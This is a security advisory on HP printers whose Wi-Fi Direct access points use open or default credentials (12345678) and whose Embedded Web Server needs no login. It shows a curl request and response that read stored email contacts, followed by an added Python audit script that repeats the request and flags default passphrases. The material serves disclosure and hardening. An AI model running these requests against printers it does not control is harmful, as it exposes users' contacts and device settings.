HP Printers Wi-Fi Direct Improper Access Control
NESESO-2017-0111
6. Credits
This vulnerability was discovered and researched by a member of the Neseso Research Team.
7. Technical Description
Wi-Fi Direct Improper Access Control
Wi-Fi Direct [1], initially called Wi-Fi P2P, is a Wi-Fi standard that lets devices connect directly to each other without a wireless access point. It is used for everything from internet browsing to file transfer, and lets a device communicate with one or more peers simultaneously at typical Wi-Fi speeds. When two devices want to connect, they authenticate using methods such as PIN, Push-Button or NFC.
HP Printers implement Wi-Fi Direct [2] support in two ways: one as described in the Wi-Fi Direct specification, and the other by providing a Wi-Fi access point that either has no security or uses insecure default credentials (the passphrase 12345678 is used by default on newer models). This gives access to anyone near enough to establish a Wi-Fi connection, without any user interaction or notification. The second vulnerability is that the printing services and others, such as the Embedded Web Server, have no authentication by default, which gives anyone the ability not only to access sensitive information but also to modify the device configuration. Together, these two vulnerabilities expose user information and give unrestricted remote read/write access to the configuration and services of the printer.
Below are two examples of HTTP requests that attackers could use to access emails stored on the device or disable automatic firmware updates.
$ curl -v --insecure https://192.168.223.1/DevMgmt/Email/Contacts
* Trying 192.168.223.1...
* Connected to 192.168.223.1 (192.168.223.1) port 443 (#0)
* TLS 1.2 connection using TLS_RSA_WITH_AES_256_CBC_SHA256
* Server certificate: HP16B465
> GET /DevMgmt/Email/Contacts HTTP/1.1
> Host: 192.168.223.1
> User-Agent: curl/7.43.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: HP HTTP Server; HP HP OfficeJet Pro 8710 - D9L18A; Serial Number:
XXXXXXXXXX; Built:Wed May 11, 2016 03:44:38PM {WBP2CN1619BR}
< Content-Type: text/xml
< Content-Length: 203
< Cache-Control: must-revalidate, max-age=0
< Pragma: no-cache
<
* Connection #0 to host 192.168.1.17 left intact
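The capture above shows the two things an administrator should verify after hardening a printer: that the Embedded Web Server no longer serves the /DevMgmt/Email/Contacts endpoint without a credential challenge, and that the Wi-Fi Direct passphrase is no longer the factory default. The following audit script is an added example written for this page; it is not part of the advisory or of any HP tooling. It reproduces the advisory's unauthenticated GET (certificate verification disabled, like the advisory's curl --insecure, because the printer presents a self-signed certificate), classifies the response, and parses the model and serial number that the Server header disclosed in the capture. The `simulated_fetch` helper, its placeholder XML body and the verdict names are constructed for the example; the only endpoint and header values used are those shown on the page.

```python
import re
import ssl
import urllib.error
import urllib.request

# Endpoint from the advisory: the EWS served stored e-mail contacts here with no authentication.
SENSITIVE_PATHS = ["/DevMgmt/Email/Contacts"]

# Wi-Fi Direct passphrase the advisory reports as the factory default on newer models.
DEFAULT_WIFI_DIRECT_PASSPHRASE = "12345678"

# Layout of the Server header as captured in the advisory (model; serial; build).
_SERVER_RE = re.compile(
    r"HP HTTP Server;\s*(?P<model>.+?);\s*Serial Number:\s*(?P<serial>[^;]+?);\s*Built:(?P<built>.+)"
)

# Headers exactly as captured in the advisory, used by the offline simulation below.
CAPTURED_HEADERS = {
    "Server": "HP HTTP Server; HP HP OfficeJet Pro 8710 - D9L18A; Serial Number: "
              "XXXXXXXXXX; Built:Wed May 11, 2016 03:44:38PM {WBP2CN1619BR}",
    "Content-Type": "text/xml",
}


def _hdr(headers, name):
    """Case-insensitive header lookup (servers and urllib differ in header casing)."""
    for k, v in headers.items():
        if k.lower() == name.lower():
            return v
    return None


def parse_server_header(value):
    """Extract model, serial and build from the EWS Server header; None if it does not match."""
    m = _SERVER_RE.search(value or "")
    if not m:
        return None
    return {k: v.strip() for k, v in m.groupdict().items()}


def classify_response(status, headers, body):
    """Turn an EWS response into an audit verdict.

    exposed   - content served with no authentication challenge (the advisory's finding)
    protected - the server demanded credentials or refused the request
    absent    - the endpoint does not exist on this firmware
    other     - anything else; inspect manually
    """
    if status in (401, 403):
        return "protected"
    if status == 404:
        return "absent"
    if status == 200 and body and "xml" in (_hdr(headers, "Content-Type") or "").lower():
        return "exposed"
    return "other"


def fetch(base_url, path, timeout=5):
    """GET a path on the printer; returns (status, headers, body). Self-signed cert, so no verification."""
    ctx = ssl._create_unverified_context()
    req = urllib.request.Request(base_url.rstrip("/") + path, headers={"Accept": "*/*"})
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, dict(e.headers), e.read().decode("utf-8", "replace")


def simulated_fetch(base_url, path):
    """Constructed stand-in for fetch() that replays the advisory's capture (placeholder body)."""
    return 200, dict(CAPTURED_HEADERS), "<!-- constructed placeholder body -->"


def audit_ews(base_url, paths=SENSITIVE_PATHS, fetcher=fetch):
    """Probe each sensitive path once and return one finding per path."""
    findings = []
    for path in paths:
        status, headers, body = fetcher(base_url, path)
        findings.append({
            "path": path,
            "status": status,
            "verdict": classify_response(status, headers, body),
            "device": parse_server_header(_hdr(headers, "Server")),
        })
    return findings


def audit_wifi_direct_passphrase(passphrase):
    """Flag the factory default; an all-digit passphrase is flagged as weak (policy assumed here)."""
    if passphrase == DEFAULT_WIFI_DIRECT_PASSPHRASE:
        return "default-passphrase"
    if passphrase.isdigit():
        return "digits-only"
    return "ok"


if __name__ == "__main__":
    # Offline run against the replayed capture; pass fetcher=fetch to audit a real device you own.
    for f in audit_ews("https://192.168.223.1", fetcher=simulated_fetch):
        print(f["path"], f["status"], f["verdict"], f["device"])
    print("wifi-direct:", audit_wifi_direct_passphrase("12345678"))
```

Run against a printer after enabling EWS authentication and changing the Wi-Fi Direct passphrase, every path should come back as "protected" and the passphrase check as "ok"; an "exposed" verdict means the condition described in this advisory is still present.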